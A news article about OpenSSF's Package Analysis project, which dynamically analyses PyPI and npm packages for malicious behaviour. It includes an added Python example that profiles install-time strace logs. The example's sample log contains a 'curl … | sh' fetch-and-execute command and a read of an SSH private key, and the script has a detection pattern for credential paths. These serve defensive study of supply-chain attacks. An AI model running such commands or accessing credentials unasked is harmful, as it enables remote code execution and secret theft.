The Open Source Security Foundation (OpenSSF) has announced the
initial prototype release of a new tool that’s capable of carrying
out dynamic analysis of all packages uploaded to popular open
source repositories.
Called the Package Analysis[1]
project, the initiative aims to secure open-source packages by
detecting and alerting users to any malicious behavior with the
goal of bolstering the security of the software supply chain and
increasing trust in open-source software.
“The Package Analysis project seeks to understand the behavior
and capabilities of packages available on open source repositories:
what files do they access, what addresses do they connect to, and
what commands do they run?” the OpenSSF said[2].
“The project also tracks changes in how packages behave over
time, to identify when previously safe software begins acting
suspiciously,” the foundation’s Caleb Brown and David A. Wheeler
added.
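To make the behaviour classes in the quote above concrete (files accessed, addresses connected to, commands run) and to show what "tracking changes in how packages behave over time" amounts to in practice, the following Python script is example code added for this page; it is not the Package Analysis project's own implementation. It assumes the package was installed in a throwaway sandbox under `strace -f -e trace=file,network,process` with default output formatting (no `-y`, no `-v`), and it parses a constructed log for a hypothetical package `examplepkg`. The sample lines, the `examplepkg` name, the RFC 5737 / RFC 3849 documentation addresses and the alert heuristics are all assumptions of this example.

```python
"""Behavioural profile of a sandboxed package install, from an strace log.

Example code added for this page (not from the OpenSSF Package Analysis
project).  It reduces a `strace -f -e trace=file,network,process` log to the
three behaviour classes the project records (files accessed, addresses
connected to, commands run) and diffs two versions' profiles so that
behaviour a release newly acquired can be flagged.
"""
import re
import shlex
from dataclasses import dataclass, field

# Constructed strace output for two versions of a hypothetical package
# "examplepkg" (an assumption of this example).  IPs are RFC 5737 / RFC 3849
# documentation ranges; nothing below was captured from a real install.
STRACE_V1 = """\
[pid  4242] execve("/usr/bin/python3", ["python3", "-m", "pip", "install", "examplepkg"], 0x7ffc0e3a /* 22 vars */) = 0
[pid  4242] openat(AT_FDCWD, "/usr/lib/python3.10/site-packages/pip/__init__.py", O_RDONLY|O_CLOEXEC) = 3
[pid  4242] connect(5, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("198.51.100.10")}, 16) = 0
[pid  4242] openat(AT_FDCWD, "/tmp/pip-build/examplepkg/setup.py", O_RDONLY|O_CLOEXEC) = 6
[pid  4242] connect(4, {sa_family=AF_UNIX, sun_path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
"""
# The next release repeats the benign activity and adds new calls, one of
# them split by strace into an "<unfinished ...>" / "<... resumed>" pair.
STRACE_V2 = STRACE_V1 + """\
[pid  4250] openat(AT_FDCWD, "/home/build/.ssh/id_rsa", O_RDONLY) = 7
[pid  4251] execve("/bin/sh", ["sh", "-c", "curl -s http://203.0.113.7/x | sh"], 0x55d0c1 /* 22 vars */ <unfinished ...>
[pid  4251] <... execve resumed>) = 0
[pid  4252] connect(8, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("203.0.113.7")}, 16) = 0
[pid  4252] connect(9, {sa_family=AF_INET6, sin6_port=htons(80), sin6_flowinfo=htonl(0), inet_pton(AF_INET6, "2001:db8::7", &sin6_addr), sin6_scope_id=0}, 28) = -1 ECONNREFUSED (Connection refused)
"""

PID_PREFIX = re.compile(r"^\[pid\s+\d+\]\s+")
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one strace-escaped C string
OPEN_RE = re.compile(r'^(?:openat\(\w+,\s*|open\()"((?:[^"\\]|\\.)*)"')
CONNECT_RE = re.compile(  # IPv4 and IPv6 sockets only; AF_UNIX is ignored
    r"^connect\(\d+,\s*\{sa_family=AF_INET6?,\s*sin6?_port=htons\((\d+)\).*?"
    r'inet_(?:addr|pton)\((?:AF_INET6?,\s*)?"([^"]+)"')
EXEC_RE = re.compile(r'^execve\("([^"]+)",\s*\[(.*?)\],')


@dataclass
class Profile:
    files: set = field(default_factory=set)      # paths passed to open/openat
    addresses: set = field(default_factory=set)  # "host:port" of IP connect()s
    commands: set = field(default_factory=set)   # execve, as a shell-quoted line


def parse_strace(log: str) -> Profile:
    """Build a Profile from strace text.  Attempts are recorded regardless of
    the return value: a failed read of ~/.ssh/id_rsa is as telling as one
    that succeeds."""
    prof = Profile()
    for raw in log.splitlines():
        line = PID_PREFIX.sub("", raw.strip())
        # strace prints a call interrupted by another process as an
        # "<unfinished ...>" line carrying the arguments and a later
        # "<... resumed>" line carrying only the result: parse the former,
        # skip the latter so nothing is counted twice or mis-parsed.
        if "resumed>" in line:
            continue
        if m := OPEN_RE.match(line):
            prof.files.add(m.group(1))
        elif m := CONNECT_RE.match(line):
            port, host = m.groups()
            prof.addresses.add(f"[{host}]:{port}" if ":" in host else f"{host}:{port}")
        elif m := EXEC_RE.match(line):
            path, argv = m.group(1), QUOTED.findall(m.group(2))
            # Record the resolved binary instead of argv[0], which a dropper
            # can set to anything it likes.
            prof.commands.add(shlex.join([path] + argv[1:]))
    return prof


def new_behaviour(old: Profile, new: Profile) -> Profile:
    """Behaviour present in `new` that `old` never showed."""
    return Profile(files=new.files - old.files,
                   addresses=new.addresses - old.addresses,
                   commands=new.commands - old.commands)


# Paths whose first-ever access by an installer deserves a look.  This list is
# an assumption of the example, not the project's rule set.
SENSITIVE_PATH = re.compile(r"(^|/)\.(ssh|aws|gnupg|pypirc|npmrc)(/|$)|/etc/(passwd|shadow)$")


def alerts(delta: Profile) -> list:
    """Reasons to review a release, derived only from newly acquired behaviour.
    New files are ordinary between versions, so only sensitive paths alert; a
    new subprocess or network destination at install time always does."""
    out = [f"new command run at install time: {c}" for c in sorted(delta.commands)]
    out += [f"new network destination: {a}" for a in sorted(delta.addresses)]
    out += [f"new access to sensitive path: {p}" for p in sorted(delta.files)
            if SENSITIVE_PATH.search(p)]
    return out


if __name__ == "__main__":
    delta = new_behaviour(parse_strace(STRACE_V1), parse_strace(STRACE_V2))
    for reason in alerts(delta):
        print(reason)
```

To produce a real log, run the install inside a disposable container with `strace -f -o install.log -e trace=file,network,process pip install <pkg>` and pass the file contents to `parse_strace`. strace only records what that one run of the install step did: a payload that fires on first import, waits for a later date, or checks for a sandbox first leaves nothing in the log, so a profile has to be re-taken for every release rather than trusted from a single run.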
In a test run that lasted a month, the tool identified more than
200 malicious packages[3]
uploaded to PyPI and NPM, with a majority of the rogue libraries
leveraging dependency confusion[4]
and typosquatting[5]
attacks.
Google, which is a member of OpenSSF, has also rallied its support[6]
behind the Package Analysis project, while emphasizing the need for
“vetting packages being published in order to keep users safe.”
Last year, the tech giant’s Open Source Security Team put forth a
framework called Supply-chain Levels for Software Artifacts
(SLSA[7]) to ensure the integrity
of software packages and prevent unauthorized modifications.
The development comes as the open source[8]
ecosystem[9]
is being increasingly[10] weaponized[11] to target developers
with a variety of malware, including cryptocurrency miners and
information stealers.
References
[1] Package Analysis (github.com)
[2] said (openssf.org)
[3] 200 malicious packages (github.com)
[4] dependency confusion (thehackernews.com)
[5] typosquatting (thehackernews.com)
[6] rallied its support (security.googleblog.com)
[7] SLSA (thehackernews.com)
[8] open source (thehackernews.com)
[9] ecosystem (thehackernews.com)
[10] increasingly (thehackernews.com)
[11] weaponized (thehackernews.com)
Read more https://thehackernews.com/2022/05/heres-new-tool-that-scans-for-malicious.html